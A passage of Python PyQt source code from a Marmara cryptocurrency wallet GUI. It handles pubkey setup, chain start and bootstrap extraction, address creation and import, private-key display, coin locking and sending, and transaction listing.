QTableWidgetItem(str(known_address)))\n self.addresses_tableWidget.horizontalHeader().setSectionResizeMode(4, QHeaderView.ResizeToContents)\n if rowcount == 0:\n break\n\n @pyqtSlot()\n def set_pubkey(self):\n button = self.sender()\n index = self.addresses_tableWidget.indexAt(button.pos())\n if index.isValid():\n self.worker_setpubkey = marmarachain_rpc.RpcHandler()\n method = cp.setpubkey\n params = [self.addresses_tableWidget.item(index.row(), 3).text()]\n self.worker_thread(self.thread_setpubkey, self.worker_setpubkey, method, params, self.set_pubkey_result)\n\n @pyqtSlot(tuple)\n def set_pubkey_result(self, result_out):\n if result_out[0]:\n self.get_getinfo()\n if str(json.loads(result_out[0])).rfind('error') > -1:\n pubkey = json.loads(result_out[0])['pubkey']\n logging.info('this pubkey: ' + pubkey + ' is already set')\n self.bottom_info(result_out[0])\n logging.info(result_out[0])\n\n message_box = self.custom_message(self.tr('Pubkey set'), str(json.loads(result_out[0])['pubkey']),\n \"information\",\n QMessageBox.Information)\n if message_box == QMessageBox.Ok:\n self.update_addresses_table()\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def start_chain_with_pubkey(self):\n button = self.sender()\n index = self.addresses_tableWidget.indexAt(button.pos())\n logging.info(index.row())\n logging.info(index.column())\n if index.isValid():\n pubkey = self.addresses_tableWidget.item(index.row(), 3).text()\n self.start_chain_settings(pubkey)\n\n def start_chain_settings(self, pubkey=None):\n if pubkey:\n self.bottom_info(self.tr('Chain started with pubkey'))\n logging.info('Chain started with pubkey')\n reindex_param = ''\n rescan_param = ''\n if self.reindex_checkBox.checkState():\n reindex_param = ' -reindex'\n if self.rescan_checkBox.checkState():\n rescan_param = ' -rescan'\n start_param = pubkey + reindex_param + rescan_param\n logging.info(start_param)\n marmarachain_rpc.start_chain(start_param)\n time.sleep(0.5)\n self.addresses_tableWidget.setColumnHidden(0, True)\n self.is_chain_ready()\n else:\n logging.info('sending chain start command')\n self.bottom_info(self.tr('sending chain start command'))\n marmarachain_rpc.start_chain()\n self.disable_start_button()\n self.is_chain_ready()\n # self.is_chain_ready()\n # self.start_pubkey = pubkey\n # font = QFont()\n # font.setPointSize(self.default_fontsize)\n # startchainDialog = QDialog(self)\n # startchainDialog.setWindowTitle(self.tr('Settings for Chain Start'))\n # startchainDialog.layout = QVBoxLayout()\n # startchainDialog.setFont(font)\n # apply_button = QPushButton('Start')\n # apply_button.setIcon(QIcon(self.icon_path + \"/start_icon.png\"))\n # apply_button.setFont(font)\n # button_layout = QHBoxLayout()\n # self.reindex = QtWidgets.QCheckBox('reindex' + self.tr(' (starts from beginning and re-indexes currently '\n # 'synced blockchain data)'))\n # self.reindex.setChecked(False)\n # self.rescan = QtWidgets.QCheckBox('rescan' + self.tr(' (starts scanning wallet data in blockchain data)'))\n # self.rescan.setChecked(False)\n # self.reindex.setFont(font)\n # self.rescan.setFont(font)\n # spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n # startchainDialog.setLayout(startchainDialog.layout)\n # startchainDialog.layout.addWidget(self.reindex)\n # startchainDialog.layout.addWidget(self.rescan)\n # startchainDialog.layout.addLayout(button_layout)\n # button_layout.addItem(spacer_item)\n # button_layout.addWidget(apply_button)\n #\n # apply_button.clicked.connect(self.start_chain_with_settings)\n # apply_button.clicked.connect(startchainDialog.close)\n # startchainDialog.exec_()\n\n # @pyqtSlot()\n # def start_chain_with_settings(self):\n # reindex_param = ''\n # rescan_param = ''\n # if self.reindex.checkState():\n # reindex_param = ' -reindex'\n # if self.rescan.checkState():\n # rescan_param = ' -rescan'\n # start_param = self.start_pubkey + reindex_param + rescan_param\n # logging.info(start_param)\n # marmarachain_rpc.start_chain(start_param)\n # time.sleep(0.5)\n # self.addresses_tableWidget.setColumnHidden(0, True)\n # self.is_chain_ready()\n\n @pyqtSlot()\n def download_blocks(self):\n font = QFont()\n font.setPointSize(self.default_fontsize)\n blocksDialog = QDialog(self)\n blocksDialog.setWindowTitle(self.tr('Download Blocks bootstrap'))\n blocksDialog.layout = QGridLayout()\n blocksDialog.setFont(font)\n description_label = QtWidgets.QLabel()\n spacer_item = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)\n browse_button = QtWidgets.QPushButton(self.tr('Browse ../ Extract'))\n browse_button.setFont(font)\n download_button = QtWidgets.QPushButton('Download')\n download_button.setFont(font)\n description_label.setText(\n self.tr('You can either download or browse and extract previously downloaded bootstrap.'))\n description_label.setFont(font)\n\n blocksDialog.setLayout(blocksDialog.layout)\n blocksDialog.layout.addWidget(description_label, 0, 0, 1, 3)\n blocksDialog.layout.addItem(spacer_item, 1, 0, 1, 1)\n blocksDialog.layout.addWidget(download_button, 1, 1, 1, 1)\n blocksDialog.layout.addWidget(browse_button, 1, 2, 1, 1)\n\n # if self.download_button.clicked():\n download_button.clicked.connect(self.download_bootstrap_via_webbrowser)\n download_button.clicked.connect(blocksDialog.close)\n browse_button.clicked.connect(self.browse_bootstrap)\n browse_button.clicked.connect(blocksDialog.close)\n blocksDialog.exec_()\n\n @pyqtSlot()\n def download_bootstrap_via_webbrowser(self):\n if marmarachain_rpc.is_local:\n webbrowser.open_new('https://eu.bootstrap.dexstats.info/MCL-bootstrap.tar.gz')\n else:\n pass\n\n @pyqtSlot()\n def browse_bootstrap(self):\n home_path = str(pathlib.Path.home())\n get_bootstrap_path = QFileDialog.getOpenFileName(self, caption=self.tr('select bootstrap.tar.gz'),\n directory=home_path, filter='*.tar.gz')\n bootstrap_path = str(get_bootstrap_path).split(',')[0].replace('(', '').replace(\"'\", '')\n if platform.system() == 'Darwin':\n destination_path = os.environ['HOME'] + '/Library/Application Support/Komodo/MCL'\n elif platform.system() == 'Linux':\n destination_path = os.environ['HOME'] + '/.komodo/MCL'\n elif platform.system() == 'Win64' or platform.system() == 'Windows':\n destination_path = '%s\\Komodo\\MCL' % os.environ['APPDATA']\n messagebox = self.custom_message(self.tr(\"Extracting blocks\"),\n self.tr(\"Marmara chain will be closed if it is running\"), 'question',\n QMessageBox.Question)\n\n if messagebox == QMessageBox.Yes:\n self.start_animation()\n stopchain_thread = None\n if self.chain_status:\n stopchain_thread = self.stop_chain_thread()\n self.worker_extract_bootstrap = marmarachain_rpc.RpcHandler() # worker setting\n self.worker_extract_bootstrap.set_command('tar -zvxf ' + bootstrap_path + ' -C ' + destination_path)\n self.worker_extract_bootstrap.set_method(destination_path)\n self.worker_extract_bootstrap.moveToThread(self.thread_extract_bootstrap) # putting in to thread\n self.worker_extract_bootstrap.finished.connect(self.thread_extract_bootstrap.quit)\n self.worker_extract_bootstrap.finished.connect(self.stop_animation) # when finished close animation\n self.thread_extract_bootstrap.started.connect(self.worker_extract_bootstrap.extract_bootstrap)\n self.update_chain_textBrowser.clear()\n self.update_chain_textBrowser.setVisible(True)\n if stopchain_thread is None:\n self.thread_extract_bootstrap.start()\n else:\n stopchain_thread.finished.connect(self.thread_extract_bootstrap.start)\n self.worker_extract_bootstrap.output.connect(self.extract_bootstrap_out)\n if messagebox == QMessageBox.No:\n self.bottom_info(self.tr('Bootstrap extracting cancelled'))\n\n @pyqtSlot(str)\n def extract_bootstrap_out(self, output):\n self.update_chain_textBrowser.append(output)\n logging.info(output)\n if output:\n self.update_chain_textBrowser.setVisible(True)\n if output == 'None':\n self.update_chain_textBrowser.setVisible(False)\n self.bottom_info(self.tr('Extracting blocks finished'))\n logging.info('Extracting blocks finished')\n\n # to do extract bootstrap on remote server\n\n @pyqtSlot()\n def check_fork(self):\n block = self.currentblock_value_label.text()\n self.worker_getblock = marmarachain_rpc.RpcHandler()\n method = cp.getblock\n params = [block]\n self.worker_thread(self.thread_getblock, self.worker_getblock, method, params, self.out_getblock,\n execute='check_fork_api')\n\n @pyqtSlot(tuple)\n def out_getblock(self, result_out):\n if result_out[2] == 0:\n if type(result_out[1]) is list:\n fork_message = \"\"\n forked = False\n self.fork_count = 0\n index = 1\n for r_list in result_out[1]:\n for item in result_out[0]:\n if item != r_list[result_out[0].index(item)]:\n forked = True\n self.fork_count = self.fork_count + 1\n if forked:\n fork_message = fork_message + self.tr('Not Sync with explorer') + str(index) \\\n + self.tr(\" possible fork \") + '\\n'\n forked = False\n else:\n fork_message = fork_message + self.tr('Sync with ') + 'explorer' + str(index) + ' \\n'\n index = index + 1\n self.fork_message_box(str(result_out[0][0]), fork_message)\n logging.info(fork_message)\n if result_out[1] == 'error':\n self.bottom_err_info(self.tr('Could not get info from explorer. Check your network connection'))\n logging.info('Could not get info from explorer. Check your network connection')\n elif result_out[2] == 1:\n self.bottom_err_info(result_out[1])\n\n def fork_message_box(self, result, message):\n fork_message_detail = \"\"\n if 3 <= self.fork_count <= 9:\n message = message + '\\n' + self.tr('Your node forked.')\n fork_message_detail = self.tr(\"To fix your node fork, stop the chain and start again. if the fork is not \"\n \"fixed, you may try downloading blocks.\")\n self.custom_message(self.tr('Comparing Chain with Explorers'), self.tr('Checked for block height ') +\n result + '\\n' + '\\n' + message, 'information', QMessageBox.Information,\n detailed_text=fork_message_detail)\n\n @pyqtSlot()\n def update_chain_latest(self):\n if not self.latest_chain_version:\n self.check_chain_update()\n if not self.chain_versiyon_tag and self.latest_chain_version:\n installed_chain_versiyon = self.get_installed_chain_version()\n if installed_chain_versiyon:\n self.update_chain_dialogbox(self.tr('your chain version'), self.chain_versiyon_tag)\n else:\n self.update_chain_dialogbox(self.tr('Could not get your version'), \"\")\n\n if self.latest_chain_version and self.chain_versiyon_tag:\n self.update_chain_dialogbox(self.tr('your chain version'), self.chain_versiyon_tag)\n\n def update_chain_dialogbox(self, message, version):\n message_box = self.custom_message('Marmara Chain Update', message +\n version + ' \\n' + self.tr('Latest available version ')\n + self.latest_chain_version, 'question', QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.start_animation()\n stopchain_thread = None\n if self.chain_status:\n stopchain_thread = self.stop_chain_thread()\n self.worker_update_chain = marmarachain_rpc.Autoinstall()\n self.worker_update_chain.moveToThread(self.thread_chain_update) # putting in to thread\n self.worker_update_chain.finished.connect(self.thread_chain_update.quit)\n self.worker_update_chain.finished.connect(self.stop_animation) # when finished close animation\n self.thread_chain_update.started.connect(self.worker_update_chain.update_chain)\n self.update_chain_textBrowser.clear()\n if stopchain_thread is None:\n self.thread_chain_update.start()\n else:\n stopchain_thread.finished.connect(self.thread_chain_update.start)\n self.update_chain_textBrowser.setVisible(True)\n self.worker_update_chain.out_text.connect(self.update_chain_progress)\n self.worker_update_chain.finished.connect(self.update_chain_finished)\n\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Update closed'))\n logging.info('Update closed')\n\n @pyqtSlot(str)\n def update_chain_progress(self, out):\n self.update_chain_textBrowser.append(out)\n\n @pyqtSlot()\n def update_chain_finished(self):\n if self.get_installed_chain_version():\n self.custom_message(self.tr('Update finished'), self.tr('marmara chain ') +\n self.get_installed_chain_version() + self.tr(' update finished.'), 'information',\n QMessageBox.Information)\n self.update_chain_textBrowser.setVisible(False)\n self.check_chain_update()\n else:\n self.custom_message(self.tr('Update Failed'), self.tr('Something went wrong update failed.'), 'information')\n\n @pyqtSlot()\n def toggle_textbrowser(self):\n if self.update_chain_textBrowser.isVisible():\n self.update_chain_textBrowser.setVisible(False)\n self.rescan_checkBox.setVisible(False)\n self.reindex_checkBox.setVisible(False)\n else:\n self.update_chain_textBrowser.setVisible(True)\n if not self.chain_status:\n self.rescan_checkBox.setVisible(True)\n self.reindex_checkBox.setVisible(True)\n\n # ------------------\n # Chain --- wallet Address Add, import\n # -------------------\n @pyqtSlot()\n def change_address_frame_visibility(self):\n if self.add_with_seed_radiobutton.isChecked():\n self.new_address_frame.setEnabled(False)\n self.add_seed_address_frame.setEnabled(True)\n if self.add_without_seed_radiobutton.isChecked():\n self.new_address_frame.setEnabled(True)\n self.add_seed_address_frame.setEnabled(False)\n\n @pyqtSlot()\n def get_address_page(self):\n self.chain_stackedWidget.setCurrentIndex(1)\n self.passphrase_TextEdit.clear()\n self.confirm_passphrase_TextEdit.clear()\n\n @pyqtSlot()\n def get_new_address(self):\n self.worker_get_newaddress = marmarachain_rpc.RpcHandler()\n message_box = self.custom_message(self.tr('Creating New Address'),\n self.tr(\"You are about to create a new address. Are you sure?\"),\n \"question\",\n QMessageBox.Question)\n\n if message_box == QMessageBox.Yes:\n method = cp.getnewaddress\n params = []\n self.worker_thread(self.thread_getnewaddress, self.worker_get_newaddress, method, params,\n self.set_getnewaddress_result)\n\n @pyqtSlot(tuple)\n def set_getnewaddress_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n # self.bottom_info('new address = ' + str(result_out[0]))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def convertpassphrase(self):\n verified = False\n seed = self.passphrase_TextEdit.toPlainText()\n confirm_seed = self.confirm_passphrase_TextEdit.toPlainText()\n if seed:\n if seed == confirm_seed:\n verified = True\n else:\n self.bottom_info(self.tr('seed words does not match'))\n logging.warning('seed words does not match')\n else:\n self.bottom_info(self.tr('write some seed words!'))\n logging.warning('write some seed words!')\n if verified:\n self.worker_convert_passphrase = marmarachain_rpc.RpcHandler()\n method = cp.convertpassphrase\n params = [seed]\n self.worker_thread(self.thread_convertpassphrase, self.worker_convert_passphrase, method, params,\n self.convertpassphrase_result)\n\n @pyqtSlot(tuple)\n def convertpassphrase_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n wif = result['wif']\n message_box = self.custom_message(self.tr('Creating an Address'),\n self.tr(\"An address has been created with details below. Do you want to \"\n \"import this address to the wallet?\") +\n self.tr(\"
    Seed =
    \") + result['agamapassphrase'] +\n self.tr(\"
    Private Key =
    \") + wif +\n self.tr(\"
    Address =
    \") + result['address'] +\n self.tr(\"
    Pubkey =
    \") + result['pubkey'],\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.get_importprivkey(wif)\n\n # for error handling of convertpassphrase method\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def importprivkey(self):\n privkey = self.privkey_lineEdit.text()\n if privkey:\n self.get_importprivkey(privkey)\n else:\n self.bottom_info(self.tr('write private key first'))\n logging.warning('write private key first')\n\n def get_importprivkey(self, wif):\n self.worker_importprivkey = marmarachain_rpc.RpcHandler()\n method = cp.importprivkey\n params = [wif]\n self.worker_thread(self.thread_importprivkey, self.worker_importprivkey, method, params,\n self.set_importprivkey_result)\n\n @pyqtSlot(tuple)\n def set_importprivkey_result(self, result_out):\n if result_out[0]:\n self.bottom_info(str(result_out[0]))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def back_chain_widget_index(self):\n self.chain_stackedWidget.setCurrentIndex(0)\n if self.chain_status:\n self.getaddresses()\n else:\n self.update_addresses_table()\n\n @pyqtSlot()\n def see_privkey_page(self):\n self.chain_stackedWidget.setCurrentIndex(2)\n self.get_privkey_table()\n\n def get_privkey_table(self):\n self.worker_getaddress_privkey = marmarachain_rpc.RpcHandler()\n method = cp.getaddressesbyaccount\n params = ['']\n self.worker_thread(self.thread_address_privkey, self.worker_getaddress_privkey, method, params,\n self.set_privkey_table_result)\n\n @pyqtSlot(tuple)\n def set_privkey_table_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n self.addresses_privkey_tableWidget.setRowCount(len(result))\n self.addresses_privkey_tableWidget.setSortingEnabled(False)\n for address in result:\n row_number = result.index(address)\n btn_seeprivkey = QPushButton(qta.icon('mdi.shield-key', color='#cc2900'), '')\n btn_seeprivkey.setIconSize(QSize(32, 32))\n self.addresses_privkey_tableWidget.setCellWidget(row_number, 1, btn_seeprivkey)\n self.addresses_privkey_tableWidget.setItem(row_number, 0, QTableWidgetItem(address))\n self.addresses_privkey_tableWidget.horizontalHeader().setSectionResizeMode(0,\n QHeaderView.ResizeToContents)\n self.addresses_privkey_tableWidget.horizontalHeader().setSectionResizeMode(1,\n QHeaderView.ResizeToContents)\n btn_seeprivkey.clicked.connect(self.set_seeprivkey)\n self.addresses_privkey_tableWidget.setSortingEnabled(True)\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def set_seeprivkey(self):\n button = self.sender()\n index = self.addresses_privkey_tableWidget.indexAt(button.pos())\n if index.isValid():\n address = self.addresses_privkey_tableWidget.item(index.row(), 0).text()\n self.worker_see_privkey = marmarachain_rpc.RpcHandler()\n method = cp.dumpprivkey\n params = [address]\n self.worker_thread(self.thread_seeprivkey, self.worker_see_privkey, method, params,\n self.get_seeprivkey_result)\n\n @pyqtSlot(tuple)\n def get_seeprivkey_result(self, result_out):\n if result_out[0]:\n message_box = self.custom_message(self.tr('Private Key'),\n result_out[0],\n \"information\",\n QMessageBox.Information)\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --------------------------------------------------------------------\n # Wallet page functions\n # --------------------------------------------------------------------\n def marmarainfo(self, pubkey, worker_output):\n self.bottom_info(self.tr('getting marmarainfo, please wait'))\n self.worker_marmarainfo = marmarachain_rpc.RpcHandler()\n method = cp.marmarainfo\n params = ['0', '0', '0', '0', pubkey]\n self.worker_thread(self.thread_marmarainfo, self.worker_marmarainfo, method, params,\n worker_output=worker_output)\n\n @pyqtSlot()\n def get_wallet_loopinfo(self):\n pubkey = self.current_pubkey_value.text()\n self.marmarainfo(pubkey, self.marmarinfo_amount_and_loops_result)\n\n @pyqtSlot()\n def get_address_amounts(self):\n pubkey = self.current_pubkey_value.text()\n logging.info('---- current pubkey : ' + pubkey)\n if pubkey and self.myCCActivatedAddress is None:\n self.marmarainfo(pubkey, self.marmarinfo_amount_and_loops_result)\n if pubkey and self.myCCActivatedAddress:\n self.worker_get_address_amounts = marmarachain_rpc.RpcHandler()\n self.worker_thread(self.thread_get_address_amounts, self.worker_get_address_amounts,\n worker_output=self.set_address_amounts, execute='get_balances')\n if pubkey is \"\":\n self.bottom_info(self.tr('pubkey is not set!'))\n logging.warning('pubkey is not set!')\n\n @pyqtSlot(tuple)\n def set_address_amounts(self, result_out):\n if result_out[3] == 0:\n self.wallet_total_normal_value.setText(str(result_out[0]))\n if len(result_out[1]) > 0:\n address_result_out = result_out[1][0]\n else:\n address_result_out = result_out[1]\n for address in address_result_out:\n if address[0] == self.currentaddress_value.text():\n self.normal_amount_value.setText(str(address[1]))\n TotalAmountOnActivated = 0.0\n for activated in result_out[2].get('WalletActivatedAddresses'):\n TotalAmountOnActivated = TotalAmountOnActivated + activated.get('amount')\n if activated.get('activatedaddress') == self.myCCActivatedAddress:\n self.activated_amount_value.setText(str(activated.get('amount')))\n self.wallet_total_activated_value.setText(str(TotalAmountOnActivated))\n elif result_out[3] == 1:\n self.bottom_info(self.tr('Error getting address amounts'))\n logging.warning(str(result_out[0]))\n logging.warning(str(result_out[1]))\n logging.warning(str(result_out[2]))\n\n @pyqtSlot()\n def marmaralock_amount(self):\n if not self.lock_amount_value.text() == \"\":\n self.worker_marmaralock = marmarachain_rpc.RpcHandler()\n method = cp.marmaralock\n params = [self.lock_amount_value.text()]\n self.worker_thread(self.thread_marmaralock, self.worker_marmaralock, method, params,\n self.marmaralock_amount_result)\n\n @pyqtSlot(tuple)\n def marmaralock_amount_result(self, result_out):\n if result_out[0]:\n result = json.loads(result_out[0])\n logging.info(result)\n if result['result'] == 'success':\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to activate ') + self.lock_amount_value.text()\n + ' MCL',\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result['hex'])\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n if result.get('error'):\n self.bottom_info(str(result['error']))\n logging.error(str(result['error']))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def marmaraunlock_amount(self):\n if not self.unlock_amount_value.text() == \"\":\n self.worker_marmaraunlock = marmarachain_rpc.RpcHandler()\n method = cp.marmaraunlock\n params = [self.unlock_amount_value.text()]\n self.worker_thread(self.thread_marmaraunlock, self.worker_marmaraunlock, method, params,\n self.marmaraunlock_amount_result)\n\n @pyqtSlot(tuple)\n def marmaraunlock_amount_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n logging.info(str(result_out[0]).find('result'))\n if str(result_out[0]).find('result') == -1:\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to unlock ') +\n self.unlock_amount_value.text() + ' MCL',\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.sendrawtransaction(result_out[0].replace('\"', ''))\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n else:\n result = json.loads(result_out[0])\n logging.info(result)\n if result.get('result') == \"error\":\n self.bottom_info(result.get('error'))\n logging.error(result.get('error'))\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --------------------------------------------------------------------\n # sending raw transaction\n # --------------------------------------------------------------------\n\n def sendrawtransaction(self, hex):\n self.bottom_info(self.tr('Signing transaction'))\n logging.info('Signing transaction')\n self.worker_sendrawtransaction = marmarachain_rpc.RpcHandler()\n method = cp.sendrawtransaction\n params = [hex]\n time.sleep(0.1)\n self.worker_thread(self.thread_sendrawtransaction, self.worker_sendrawtransaction, method, params,\n self.sendrawtransaction_result)\n\n @pyqtSlot(tuple)\n def sendrawtransaction_result(self, result_out):\n if result_out[0]:\n result = str(result_out[0]).replace('\\n', '').replace('\"', '')\n self.bottom_info('txid: ' + result)\n logging.info('txid: ' + result)\n time.sleep(0.2) # wait for loading screen disappear\n self.custom_message(self.tr('Transaction Successful'), self.tr('TxId :') + result, \"information\")\n elif result_out[1]:\n self.bottom_err_info(result_out[1])\n\n # --------------------------------------------------------------------\n # Coin Send-Receive page functions\n # --------------------------------------------------------------------\n @pyqtSlot()\n def create_currentaddress_qrcode(self):\n if self.currentaddress_value.text() != \"\":\n # creating a pix map of qr code\n qr = qrcode.QRCode(version=1, error_correction=qrcode.constants.ERROR_CORRECT_H, box_size=7, border=1)\n qr.add_data(self.currentaddress_value.text())\n # set image to the Icon\n qr_image = qr.make_image(image_factory=Image).pixmap()\n msg = QMessageBox()\n msg.setStyleSheet(self.selected_stylesheet)\n msg.setIcon(QMessageBox.Information)\n msg.setIconPixmap(qr_image)\n msg.setWindowTitle(self.currentaddress_value.text() + \" \")\n msg.setStandardButtons(QMessageBox.Close)\n msg.exec_()\n else:\n self.bottom_info(self.tr('no address value set'))\n logging.warning('no address value set')\n\n @pyqtSlot()\n def sendtoaddress(self):\n if self.receiver_address_lineEdit.text() == \"\":\n self.bottom_info(self.tr('enter a receiver address'))\n logging.info('enter a receiver address')\n else:\n if self.sending_amount_lineEdit.text() == \"\":\n self.bottom_info(self.tr('enter some amount to send'))\n logging.warning('enter some amount to send')\n else:\n message_box = self.custom_message(self.tr('Confirm Transaction'),\n self.tr('You are about to send ') +\n self.sending_amount_lineEdit.text() + self.tr(' MCL to ') +\n self.receiver_address_lineEdit.text(),\n \"question\",\n QMessageBox.Question)\n if message_box == QMessageBox.Yes:\n self.worker_sendtoaddress = marmarachain_rpc.RpcHandler()\n method = cp.sendtoaddress\n params = [self.receiver_address_lineEdit.text(), self.sending_amount_lineEdit.text()]\n self.worker_thread(self.thread_sendtoaddress, self.worker_sendtoaddress, method, params,\n self.sendtoaddress_result)\n if message_box == QMessageBox.No:\n self.bottom_info(self.tr('Transaction aborted'))\n logging.info('Transaction aborted')\n\n @pyqtSlot(tuple)\n def sendtoaddress_result(self, result_out):\n if result_out[0]:\n logging.info(result_out[0])\n self.bottom_info('txid : ' + str(result_out[0]).replace('\\n', ''))\n if result_out[1]:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def getaddresstxids(self):\n if self.chain_status:\n address = self.currentaddress_value.text()\n start_date = self.transactions_startdate_dateTimeEdit.dateTime()\n end_date = self.transactions_endtdate_dateTimeEdit.dateTime()\n start_height = int(self.currentblock_value_label.text()) - int(\n self.change_datetime_to_block_age(start_date))\n end_height = int(self.currentblock_value_label.text()) - int(self.change_datetime_to_block_age(end_date))\n if start_height < end_height:\n if end_date > datetime.now():\n end_height = self.currentblock_value_label.text()\n if address == \"\":\n self.bottom_info(self.tr('A pubkey is not set yet! Please set a pubkey first.'))\n logging.info('A pubkey is not set yet! Please set a pubkey first.')\n else:\n self.worker_getaddresstxids = marmarachain_rpc.RpcHandler()\n method = cp.getaddresstxids\n params = [{'addresses': [address], 'start': int(start_height), 'end': int(end_height)}]\n self.worker_thread(self.thread_getaddresstxids, self.worker_getaddresstxids, method, params,\n self.getaddresstxids_result, execute='txids_detail')\n else:\n self.bottom_info(self.tr('Start Date should be before the Stop Date'))\n logging.info('Start Date should be before the Stop Date')\n else:\n self.bottom_info(self.tr('Marmarachain is not started'))\n logging.warning('Marmarachain is not started')\n\n @pyqtSlot(tuple)\n def getaddresstxids_result(self, result_out):\n if result_out[1] == 0:\n self.transactions_tableWidget.setRowCount(len(result_out[0]))\n self.transactions_tableWidget.setSortingEnabled(False)\n if len(result_out[0]) == 0:\n self.transactions_tableWidget.setRowCount(0)\n self.bottom_err_info(self.tr(\"No transaction found between selected dates.\"))\n logging.error(\"No transaction found between selected dates.\")\n else:\n for txid in result_out[0]:\n self.bottom_info(self.tr(\"fetched transactions between selected dates.\"))\n row_number = result_out[0].index(txid)\n btn_explorer = QPushButton(qta.icon('mdi.firefox', color='#728FCE'), '')\n btn_explorer.setIconSize(QSize(24, 24))\n txid_date = datetime.fromtimestamp(txid[2]).date()\n self.transactions_tableWidget.setCellWidget(row_number, 0, btn_explorer)\n self.transactions_tableWidget.setItem(row_number, 1, QTableWidgetItem(str(txid[0])))\n self.transactions_tableWidget.setItem(row_number, 2, QTableWidgetItem(str(txid[1])))\n self.transactions_tableWidget.setItem(row_number, 3, QTableWidgetItem(str(txid_date)))\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(0,\n QHeaderView.ResizeToContents)\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(1,\n QHeaderView.ResizeToContents)\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(2,\n QHeaderView.ResizeToContents)\n self.transactions_tableWidget.horizontalHeader().setSectionResizeMode(3,\n QHeaderView.ResizeToContents)\n btn_explorer.clicked.connect(self.open_in_explorer)\n self.transactions_tableWidget.setSortingEnabled(True)\n if result_out[1] == 1:\n self.bottom_err_info(result_out[1])\n\n @pyqtSlot()\n def open_in_explorer(self):\n button = self.sender()\n index = self.transactions_tableWidget.indexAt(button.pos())\n if index.isValid():\n tx_id = self.transactions_tableWidget.item(index.row(), 1).text()\n url = 'https://explorer.marmara.io/tx/' + tx_id\n webbrowser.open_new(url)\n\n @pyqtSlot(int, int)\n def transaction_itemcontext(self, row, column):\n item = self.transactions_tableWidget.item(row, column).text()\n QtWidgets.QApplication.clipboard().setText(item)\n self.bottom_info(self.tr(\"Copied \") + str(item))\n\n # -------------------------------------------------------------------\n # Credit loops functions\n # --------------------------------------------------------------------\n\n # function name: change_datetime_to_block_age\n # purpose: changes datetime to block age with given args date\n # usage: Calling function calculates the int value of block age between current datetime and date arg\n # return: str value of block_age\n def change_datetime_to_block_age(self, date):\n selected_datetime = date.toPyDateTime()\n now = datetime.now()\n if selected_datetime > now:\n time_diff = selected_datetime - now\n if now > selected_datetime:\n time_diff = now - selected_datetime\n block_age = int(time_diff.total_seconds() / 60)\n return str(block_age)\n\n def change_block_to_date(self, block):\n block_diff = int(block) - int(self.longestchain_value_label.text())\n maturity_date = datetime.now() + timedelta(minutes=block_diff)\n maturity_date_format = str(maturity_date.day) + \"/\" + str(maturity_date.month) + \"/\" + str(maturity_date.year)\n return maturity_date_format\n\n def check_pubkey_contact_name(self, pubkey):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n known_pubkey = pubkey\n for contact in contacts_data: # each contact set in contacts_data\n if contact[2] == pubkey: # contact[2] contact pubkey\n known_pubkey = contact[0] # contact[0] contact name\n break\n return known_pubkey\n\n @pyqtSlot()\n def set_request_date_state(self):\n if self.request_date_checkBox.checkState():\n self.request_dateTimeEdit.setEnabled(False)\n else:\n self.request_dateTimeEdit.setEnabled(True)\n self.request_dateTimeEdit.setDateTime(QDateTime.currentDateTime())\n self.request_dateTimeEdit.setMaximumDateTime(QDateTime.currentDateTime())\n\n @pyqtSlot()\n def change_visibilty_looprequestpubkey(self):\n if self.looprequest_currentpk_radioButton.isChecked():\n self.looprequest_otherpk_lineEdit.setHidden(True)\n self.contactpk_otherpk_looprequest_comboBox.setHidden(True)\n self.transferrequests_tableWidget.setColumnHidden(0, False)\n self.loop_request_tableWidget.setColumnHidden(0, False)\n self.loop_request_tableWidget.setRowCount(0)\n self.transferrequests_tableWidget.setRowCount(0)\n if self.looprequest_otherpk_radioButton.isChecked():\n self.looprequest_otherpk_lineEdit.setHidden(False)\n self.looprequest_otherpk_lineEdit.clear()\n self.contactpk_otherpk_looprequest_comboBox.setHidden(False)\n self.loop_request_tableWidget.setColumnHidden(0, True)\n self.transferrequests_tableWidget.setColumnHidden(0, True)\n self.loop_request_tableWidget.setRowCount(0)\n self.transferrequests_tableWidget.setRowCount(0)\n self.get_contact_names_pubkeys()\n\n @pyqtSlot()\n def get_selected_contact_pukey(self):\n contacts_data = configuration.ContactsSettings().read_csv_file()\n selected_contactpubkey_transfer = contacts_data[self.contactpk_otherpk_looprequest_comboBox.currentIndex()]\n if selected_contactpubkey_transfer[2] != 'Pubkey':\n self.looprequest_otherpk_lineEdit.setText(selected_contactpubkey_transfer[2])\n if 